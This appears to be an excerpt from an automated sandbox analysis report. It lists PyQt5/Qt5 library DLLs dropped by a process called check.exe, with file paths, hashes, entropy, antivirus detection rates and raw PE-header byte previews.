                                                                                                                                                                                                                                      SHA-256:E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
                                                                                                                                                                                                                                      SHA-512:756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libEGL.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):25072
                                                                                                                                                                                                                                      Entropy (8bit):5.961464514165753
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
                                                                                                                                                                                                                                      MD5:BB00EF1DD81296AF10FDFA673B4D1397
                                                                                                                                                                                                                                      SHA1:773FFCF4A231B963BAAC36CBEF68079C09B62837
                                                                                                                                                                                                                                      SHA-256:32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
                                                                                                                                                                                                                                      SHA-512:C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libGLESv2.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):3385328
                                                                                                                                                                                                                                      Entropy (8bit):6.382356347494905
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
                                                                                                                                                                                                                                      MD5:2247EE4356666335DF7D72129AF8D600
                                                                                                                                                                                                                                      SHA1:F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
                                                                                                                                                                                                                                      SHA-256:50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
                                                                                                                                                                                                                                      SHA-512:67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\opengl32sw.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20923392
                                                                                                                                                                                                                                      Entropy (8bit):6.255903817217008
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
                                                                                                                                                                                                                                      MD5:7DBC97BFEE0C7AC89DA8D0C770C977B6
                                                                                                                                                                                                                                      SHA1:A064C8D8967AAA4ADA29BD9FEFBE40405360412C
                                                                                                                                                                                                                                      SHA-256:963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
                                                                                                                                                                                                                                      SHA-512:286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........|.-.....|.+.*...|.*.<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):68080
                                                                                                                                                                                                                                      Entropy (8bit):6.207162014262433
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
                                                                                                                                                                                                                                      MD5:750A31DE7840B5EED8BA14C1BD84D348
                                                                                                                                                                                                                                      SHA1:D345D13B0C303B7094D1C438E49F0046791DE7F6
                                                                                                                                                                                                                                      SHA-256:A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
                                                                                                                                                                                                                                      SHA-512:5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):41968
                                                                                                                                                                                                                                      Entropy (8bit):6.0993566622860635
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
                                                                                                                                                                                                                                      MD5:313F89994F3FEA8F67A48EE13359F4BA
                                                                                                                                                                                                                                      SHA1:8C7D4509A0CAA1164CC9415F44735B885A2F3270
                                                                                                                                                                                                                                      SHA-256:42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
                                                                                                                                                                                                                                      SHA-512:06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:*..i*..i*..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i*..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qgif.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):39408
                                                                                                                                                                                                                                      Entropy (8bit):6.0316011626259405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
                                                                                                                                                                                                                                      MD5:52FD90E34FE8DED8E197B532BD622EF7
                                                                                                                                                                                                                                      SHA1:834E280E00BAE48A9E509A7DC909BEA3169BDCE2
                                                                                                                                                                                                                                      SHA-256:36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
                                                                                                                                                                                                                                      SHA-512:EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qicns.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):45040
                                                                                                                                                                                                                                      Entropy (8bit):6.016125225197622
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
                                                                                                                                                                                                                                      MD5:AD84AF4D585643FF94BFA6DE672B3284
                                                                                                                                                                                                                                      SHA1:5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
                                                                                                                                                                                                                                      SHA-256:F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
                                                                                                                                                                                                                                      SHA-512:B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qico.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38384
                                                                                                                                                                                                                                      Entropy (8bit):5.957072398645384
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
                                                                                                                                                                                                                                      MD5:A9ABD4329CA364D4F430EDDCB471BE59
                                                                                                                                                                                                                                      SHA1:C00A629419509929507A05AEBB706562C837E337
                                                                                                                                                                                                                                      SHA-256:1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
                                                                                                                                                                                                                                      SHA-512:004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qjpeg.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):421360
                                                                                                                                                                                                                                      Entropy (8bit):5.7491063936821405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
                                                                                                                                                                                                                                      MD5:16ABCCEB70BA20E73858E8F1912C05CD
                                                                                                                                                                                                                                      SHA1:4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
                                                                                                                                                                                                                                      SHA-256:FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
                                                                                                                                                                                                                                      SHA-512:3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qsvg.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):32240
                                                                                                                                                                                                                                      Entropy (8bit):5.978149408776758
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                                                      MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                                                      SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                                                      SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                                                      SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtga.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):31728
                                                                                                                                                                                                                                      Entropy (8bit):5.865766652452823
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                                                      MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                                                      SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                                                      SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
                                                                                                                                                                                                                                      SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtiff.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):390128
                                                                                                                                                                                                                                      Entropy (8bit):5.724665470266677
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                                                      MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                                                      SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                                                      SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                                                      SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwbmp.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):30192
                                                                                                                                                                                                                                      Entropy (8bit):5.938644231596902
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                                                      MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                                                      SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                                                      SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                                                      SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwebp.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):510448
                                                                                                                                                                                                                                      Entropy (8bit):6.605517748735854
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                                                      MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                                                      SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                                                      SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                                                      SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
